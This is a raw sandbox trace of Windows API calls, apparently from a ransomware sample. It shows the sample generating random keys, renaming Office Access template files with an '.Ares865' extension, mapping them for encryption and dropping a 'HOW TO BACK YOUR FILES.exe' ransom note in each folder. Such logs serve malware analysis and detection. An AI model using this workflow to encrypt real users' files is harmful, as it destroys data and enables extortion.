[0064.083] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15cf80) returned 0x3650000 [0064.139] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0064.140] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.140] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0064.140] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.160] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Sales Pipeline.accdt.Ares865") returned 84 [0064.161] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Sales Pipeline.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\sales pipeline.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Sales Pipeline.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\sales pipeline.accdt.ares865"), dwFlags=0x1) returned 1 [0064.193] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Sales Pipeline.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\sales pipeline.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0064.195] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1016214) returned 1 [0064.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0064.196] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.196] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0064.196] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0064.196] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.196] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0064.197] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf84a0, lpName=0x0) returned 0x118 [0064.197] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf84a0) returned 0x2ad0000 [0064.266] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0064.267] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.267] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0064.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0064.301] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Students.accdt.Ares865") returned 78 [0064.302] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Students.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\students.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Students.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\students.accdt.ares865"), dwFlags=0x1) returned 1 [0064.312] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Students.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\students.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0064.313] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=512023) returned 1 [0064.314] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.315] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.315] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0064.315] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0064.339] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.339] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0064.339] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d320, lpName=0x0) returned 0x118 [0064.341] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7d320) returned 0x420000 [0064.430] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0064.430] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.430] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0064.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.438] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Tasks.accdt.Ares865") returned 75 [0064.439] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Tasks.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\tasks.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Tasks.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\tasks.accdt.ares865"), dwFlags=0x1) returned 1 [0064.440] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Tasks.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\tasks.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0064.440] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=544361) returned 1 [0064.440] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.440] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.440] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0064.440] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0064.441] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.441] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0064.441] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x85170, lpName=0x0) returned 0x118 [0064.450] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85170) returned 0x420000 [0064.474] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0064.475] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.475] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0064.475] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.483] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\WSS", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\WSS") returned="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\WSS" [0064.483] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\WSS" | out: lpString1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\WSS") returned="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\WSS" [0064.483] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0064.483] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\WSS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\wss\\how to back your files.exe"), bFailIfExists=1) returned 1 [0064.486] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.487] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\WSS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14ebe6b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x57efc620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x57efc620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0064.487] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0064.487] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0064.487] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\WSS\\107.accdt.Ares865") returned 77 [0064.487] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\WSS\\107.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\wss\\107.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\WSS\\107.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\wss\\107.accdt.ares865"), dwFlags=0x1) returned 1 [0064.488] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\WSS\\107.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\wss\\107.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0064.488] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=227269) returned 1 [0064.488] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.488] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.488] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0064.488] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0064.489] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.489] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0064.489] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x37ad0, lpName=0x0) returned 0x118 [0064.490] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x37ad0) returned 0x420000 [0064.504] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0064.505] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.505] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0064.505] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.511] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\WSS\\1100.accdt.Ares865") returned 78 [0064.511] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\WSS\\1100.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\wss\\1100.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\WSS\\1100.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\wss\\1100.accdt.ares865"), dwFlags=0x1) returned 1 [0064.513] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\WSS\\1100.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\wss\\1100.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0064.513] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=259757) returned 1 [0064.513] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.513] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.513] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0064.513] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0064.514] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.514] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0064.514] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3f9b0, lpName=0x0) returned 0x118 [0064.515] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3f9b0) returned 0x420000 [0064.529] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0064.530] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.530] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0064.530] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.534] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part") returned="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part" [0064.534] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part" | out: lpString1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part") returned="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part" [0064.534] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0064.534] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\how to back your files.exe"), bFailIfExists=1) returned 1 [0064.539] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.539] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14fa2ef0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x57f94ba0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x57f94ba0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0064.540] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0064.540] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0064.540] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\1 Right.accdt.Ares865") returned 82 [0064.540] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\1 Right.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\1 right.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\1 Right.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\1 right.accdt.ares865"), dwFlags=0x1) returned 1 [0064.540] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\1 Right.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\1 right.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0064.540] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=24538) returned 1 [0064.541] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.541] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.541] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.541] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0064.542] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.542] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.542] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x62e0, lpName=0x0) returned 0x118 [0064.543] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x62e0) returned 0x1a0000 [0064.545] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0064.546] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.546] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.546] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.547] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\1 Top.accdt.Ares865") returned 80 [0064.547] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\1 Top.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\1 top.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\1 Top.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\1 top.accdt.ares865"), dwFlags=0x1) returned 1 [0064.547] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\1 Top.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\1 top.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0064.548] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=24581) returned 1 [0064.548] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.548] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.548] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.548] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0064.549] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.549] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.549] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6310, lpName=0x0) returned 0x118 [0064.550] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6310) returned 0x1a0000 [0064.552] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0064.552] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.552] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.553] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\2 Right.accdt.Ares865") returned 82 [0064.553] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\2 Right.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\2 right.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\2 Right.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\2 right.accdt.ares865"), dwFlags=0x1) returned 1 [0064.554] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\2 Right.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\2 right.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0064.554] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=25350) returned 1 [0064.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.554] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0064.555] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.555] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.555] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6610, lpName=0x0) returned 0x118 [0064.557] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6610) returned 0x1a0000 [0064.559] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0064.559] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.559] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.559] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.560] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\2 Top.accdt.Ares865") returned 80 [0064.560] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\2 Top.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\2 top.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\2 Top.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\2 top.accdt.ares865"), dwFlags=0x1) returned 1 [0064.561] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\2 Top.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\2 top.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 